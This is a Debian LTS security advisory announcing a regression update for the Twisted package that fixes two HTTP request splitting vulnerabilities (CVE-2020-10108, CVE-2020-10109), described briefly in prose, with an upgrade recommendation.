Debian Security Advisory
DLA-2145-2 twisted -- LTS regression update
- Date Reported:
- 19 Mar 2020
- Affected Packages:
- Security database references:
- In Mitre's CVE dictionary: CVE-2020-10108, CVE-2020-10109.
- More information:
It was discovered that there were was a regression introduced in DLA-2145-1 due to the incorrect application of the upstream patch for CVE-2020-10108 & CVE-2020-10109 regarding a number of HTTP request splitting vulnerabilities in Twisted, an Python event-based framework for building various types of internet applications.
Thanks to Etienne Allovon for the detailed report.
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.
For Debian 8
Jessie, these problems have been fixed in version 14.0.2-3+deb8u2.
We recommend that you upgrade your twisted packages.
Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS